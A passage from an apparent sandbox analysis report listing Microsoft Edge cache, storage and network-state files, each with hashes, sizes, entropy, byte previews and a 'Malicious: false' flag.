SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	524656
Entropy (8bit):	4.989325630401085E-4
Encrypted:	false
SSDEEP:	3:Lsulrjx:Lsuj
MD5:	A8B15FBDB8F52C75E8018FCC9EE1F9F7
SHA1:	ACC9CB488CAA1A5492D3714104C77BC748E96BC9
SHA-256:	41326FE4B54CF34E7DB36F940DE78EAFBCF16605776F2F9C2953E05609D2516F
SHA-512:	9434BE75CCA9FA5E9E1F35F6FA85F869CFB031ADA3DE53A953BA31851694C312338A96E5179860F1B6B6A63DCCFF768C7FBD98B47F503A0C84DD2FE4F96C4045
Malicious:	false
Preview:	........................................&5.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:n9hljEJtNsKl:iJR
MD5:	84999F8F228E614472A2858C7E555788
SHA1:	E1DCD6BAB5CC5F9BD442B2CED6EC7653E6A214E5
SHA-256:	6E606BE333F43E28C758358BC053BFF2881426C53EC4118103FF054EB2CA9475
SHA-512:	B3961F1407C779ED09BF63700381190D5B4C425466592FB2C12930964003548CE9A0C99605A6B3E0C2BF349CB68395BFB52760C023A7CCCB6E8E09EE3780AB96
Malicious:	false
Preview:	(...z...oy retne............................./.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:n9hljEJtNsKl:iJR
MD5:	84999F8F228E614472A2858C7E555788
SHA1:	E1DCD6BAB5CC5F9BD442B2CED6EC7653E6A214E5
SHA-256:	6E606BE333F43E28C758358BC053BFF2881426C53EC4118103FF054EB2CA9475
SHA-512:	B3961F1407C779ED09BF63700381190D5B4C425466592FB2C12930964003548CE9A0C99605A6B3E0C2BF349CB68395BFB52760C023A7CCCB6E8E09EE3780AB96
Malicious:	false
Preview:	(...z...oy retne............................./.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:CWPKHtTEQhmQ+:CI6tg0mN
MD5:	3C842498780D8441B594307948644D98
SHA1:	364A728430133DB2E8AF83E445A07767DF4C036A
SHA-256:	A0613EA0AE4F10CB4EAA946EB751FEF0291BE10F6DEC8C7AC3DBEFFDE949477C
SHA-512:	578D618268679C8AE55C8B2049C0297462E0493FF4D5785C7524F6251A53CB9AD45EC6021801D99460AB71C5DF60C59C55DC424773C4B5A76F2888D9C480A883
Malicious:	false
Preview:	(....sj.oy retne............................./.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	48
Entropy (8bit):	2.9972243200613975
Encrypted:	false
SSDEEP:	3:CWPKHtTEQhmQ+:CI6tg0mN
MD5:	3C842498780D8441B594307948644D98
SHA1:	364A728430133DB2E8AF83E445A07767DF4C036A
SHA-256:	A0613EA0AE4F10CB4EAA946EB751FEF0291BE10F6DEC8C7AC3DBEFFDE949477C
SHA-512:	578D618268679C8AE55C8B2049C0297462E0493FF4D5785C7524F6251A53CB9AD45EC6021801D99460AB71C5DF60C59C55DC424773C4B5A76F2888D9C480A883
Malicious:	false
Preview:	(....sj.oy retne............................./.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNlyN:Ls3yN
MD5:	432DFDB855CE25DE4B0ABC3EF3DA9DE2
SHA1:	FCCD91C6A957A5E5765B64F5231E19462CE232C0
SHA-256:	25C5AEE8BB06BE4FAC4DB89B78F51BC1FC46801C46CACD0DC1CC23F904CFB124
SHA-512:	4DE39315B5E29F88F5A03929BBD89A0A7164ED0CF58F7CDF1B0403EC98AC4E0595F512ED0E10880AACA2AC52C8C29984775DA4A9E542F79311B0F195ECC65863
Malicious:	false
Preview:	........................................s..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	8.280239615765425E-4
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2:/M/xT02
MD5:	D0D388F3865D0523E451D6BA0BE34CC4
SHA1:	8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:	902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:	376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.47693366977411E-4
Encrypted:	false
SSDEEP:	3:LsNloNr:Ls3oNr
MD5:	5C8C0DDBC6421396CF1547802F8CEF2C
SHA1:	1E4A3B28B9904A241031A17F60B6C8544CD8F720
SHA-256:	89CE8DD3E4F28D7E5CF8A4D1C921291CC3C193D3C58FFBAF883A47E3164122D5
SHA-512:	85B3CFF001D75A608D4EB24DC7A517E795D550C199AD97EA729D99219E8727B029BFBA13045F9CBC92F61CA36355C7D26340BB166B3675F5D8E4A19420D02397
Malicious:	false
Preview:	............................................./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	373
Entropy (8bit):	5.2179580264170005
Encrypted:	false
SSDEEP:	6:iOHO0RM1wkn23fpEUjqEKj3K/2jM8B2KLldZN4q2Pwkn23fpEUjqEKj3K/2jMGIg:75rffqBvFLFN4vYffqBQFUv
MD5:	5E2DCDA9573CAD2B03D801370851ABF2
SHA1:	544837649CC966BB8FB2D63AA0D9BDD8C6C50C71
SHA-256:	A193E70BA6A32EF6A8DB6B8CF3056C59600D158DFECBF4C9D51978816359D27F
SHA-512:	0CB6BB9982EC78A8EA7C0C0D30F2417292E4ACC91716A466F140B1FFC26C3522A22F6218C550BC7EE22B6966CD650AC0E3DA0EAB2DE309B5DADC0FFA9D314820
Malicious:	false
Preview:	2025/01/05-02:32:35.727 e54 Creating DB C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb since it was missing..2025/01/05-02:32:35.940 e54 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\3f8a4223-5c91-496d-b108-b07e20fdc89f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7708940b-963a-489e-ac79-db54f2344fc2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.619434150836742
Encrypted:	false
SSDEEP:	3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
MD5:	2800881C775077E1C4B6E06BF4676DE4
SHA1:	2873631068C8B3B9495638C865915BE822442C8B
SHA-256:	226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
SHA-512:	E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
Malicious:	false
Preview:	{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.5559635235158827
Encrypted:	false
SSDEEP:	48:T6IopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:OIEumQv8m1ccnvS6
MD5:	9AAAE8C040B616D1378F3E0E17689A29
SHA1:	F91E7DE07F1DA14D15D067E1F50C3B84A328DBB7
SHA-256:	5B94D63C31AE795661F69B9D10E8BFD115584CD6FEF5FBB7AA483FDC6A66945B
SHA-512:	436202AB8B6BB0318A30946108E6722DFF781F462EE05980C14F57F347EDDCF8119E236C3290B580CEF6902E1B59FB4F546D6BD69F62479805B39AB0F3308EC1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.36515621748816035
Encrypted:	false
SSDEEP:	24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
MD5:	25363ADC3C9D98BAD1A33D0792405CBF
SHA1:	D06E343087D86EF1A06F7479D81B26C90A60B5C3
SHA-256:	6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
SHA-512:	CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\TmpUserData\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c974953b-c650-41e0-a6c2-528992e4a2c2.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
